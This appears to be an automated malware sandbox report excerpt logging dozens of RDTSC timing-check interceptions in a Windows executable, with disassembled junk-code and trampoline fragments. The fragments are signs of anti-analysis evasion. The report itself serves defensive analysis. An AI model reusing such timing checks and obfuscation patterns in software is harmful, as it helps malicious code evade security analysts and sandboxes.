              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1581 second address: 2D1585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1658 second address: 2D1673 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B267h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1673 second address: 2D1690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C50349h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1690 second address: 2D16A2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0CB0E1B256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2203 second address: 2D2207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2207 second address: 2D220D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D220D second address: 2D227F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0CB0C5034Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F0CB0C50338h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov di, 4DAFh 0x00000029 lea eax, dword ptr [ebp+12475BB9h] 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F0CB0C50338h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 or dword ptr [ebp+122D34F9h], ecx 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jns 00007F0CB0C50338h 0x00000058 push ebx 0x00000059 pop ebx 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D227F second address: 2BBCD3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0CB0E1B25Ch 0x00000008 jnc 00007F0CB0E1B256h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov edx, dword ptr [ebp+122D360Ah] 0x00000019 lea eax, dword ptr [ebp+12475B75h] 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007F0CB0E1B258h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 nop 0x0000003a jmp 00007F0CB0E1B268h 0x0000003f push eax 0x00000040 jnl 00007F0CB0E1B260h 0x00000046 nop 0x00000047 push 00000000h 0x00000049 push esi 0x0000004a call 00007F0CB0E1B258h 0x0000004f pop esi 0x00000050 mov dword ptr [esp+04h], esi 0x00000054 add dword ptr [esp+04h], 00000019h 0x0000005c inc esi 0x0000005d push esi 0x0000005e ret 0x0000005f pop esi 0x00000060 ret 0x00000061 mov dword ptr [ebp+122D3504h], esi 0x00000067 call dword ptr [ebp+12447189h] 0x0000006d jmp 00007F0CB0E1B25Dh 0x00000072 push esi 0x00000073 pushad 0x00000074 je 00007F0CB0E1B256h 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31816D second address: 31817F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0C5033Dh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31830E second address: 318329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B267h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 318329 second address: 318352 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F0CB0C50336h 0x00000012 jmp 00007F0CB0C50342h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 318352 second address: 318356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 318956 second address: 31895E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31895E second address: 318963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 318963 second address: 318968 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31BD50 second address: 31BD54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31EEDD second address: 31EEE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31EEE1 second address: 31EEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31EEE7 second address: 31EEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31E7A7 second address: 31E7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0CB0E1B256h 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31E7B2 second address: 31E7B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31E935 second address: 31E939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31E939 second address: 31E956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50349h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31E956 second address: 31E960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31E960 second address: 31E966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31EA82 second address: 31EABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F0CB0E1B269h 0x0000000e jmp 00007F0CB0E1B261h 0x00000013 jo 00007F0CB0E1B256h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 323830 second address: 323836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 323836 second address: 323846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F0CB0E1B256h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 323846 second address: 32384C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32384C second address: 323851 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 322D55 second address: 322D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 322D5B second address: 322D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32308E second address: 3230A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50347h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3230A9 second address: 3230B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3230B6 second address: 3230BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3231E7 second address: 3231ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32334F second address: 32336D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jbe 00007F0CB0C50336h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32336D second address: 32337E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F0CB0E1B25Ch 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 329D7C second address: 329D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0CB0C50349h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 329D9F second address: 329DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 329DA3 second address: 329DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 329DA7 second address: 329DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0CB0E1B256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 329DB8 second address: 329DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 329DBE second address: 329DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 329DC9 second address: 329DD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328693 second address: 32869F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0CB0E1B256h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328B95 second address: 328B9F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0CB0C50336h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328CEA second address: 328CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328CF1 second address: 328CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328CF9 second address: 328CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1D24 second address: 2D1D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jbe 00007F0CB0C50348h 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F0CB0C50336h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1D38 second address: 2D1D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1D3C second address: 2D1D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jg 00007F0CB0C5033Ah 0x0000000d mov di, E7BAh 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F0CB0C50338h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d nop 0x0000002e je 00007F0CB0C50340h 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1D7C second address: 2D1D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F0CB0E1B256h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32902B second address: 32903B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C406 second address: 32C40A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C40A second address: 32C41C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F0CB0C50336h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C41C second address: 32C420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C420 second address: 32C426 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C426 second address: 32C42D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C750 second address: 32C766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0CB0C5033Ch 0x0000000c jnc 00007F0CB0C50336h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C766 second address: 32C76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32CA80 second address: 32CA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32CA86 second address: 32CA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3324CF second address: 3324EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50344h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333047 second address: 333051 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333051 second address: 333057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33338A second address: 3333AD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0CB0E1B256h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0CB0E1B25Bh 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 jnp 00007F0CB0E1B256h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333C96 second address: 333CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F0CB0C5033Ah 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333CA5 second address: 333CE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0CB0E1B256h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F0CB0E1B25Eh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F0CB0E1B264h 0x0000001a jc 00007F0CB0E1B256h 0x00000020 push edi 0x00000021 pop edi 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333CE4 second address: 333CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3382F2 second address: 338308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F0CB0E1B256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F0CB0E1B25Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 338475 second address: 33848E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50345h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33848E second address: 338494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 338494 second address: 3384AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F0CB0C50336h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F0CB0C50338h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3384AA second address: 3384BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B261h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3384BF second address: 3384C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 338636 second address: 33863C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3387F8 second address: 338801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D1DF second address: 33D1E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D1E3 second address: 33D1ED instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0CB0C50336h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D1ED second address: 33D20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jne 00007F0CB0E1B256h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F0CB0E1B25Bh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D20C second address: 33D210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D210 second address: 33D216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D216 second address: 33D21C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D21C second address: 33D228 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D228 second address: 33D22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D22C second address: 33D230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 345A1F second address: 345A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343BDD second address: 343BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0E1B25Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343BED second address: 343BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343D4B second address: 343D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343D4F second address: 343D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34403D second address: 344042 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 344042 second address: 34408B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0C50341h 0x00000009 pop edi 0x0000000a jmp 00007F0CB0C50346h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 jmp 00007F0CB0C50346h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34408B second address: 34408F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34448A second address: 344492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
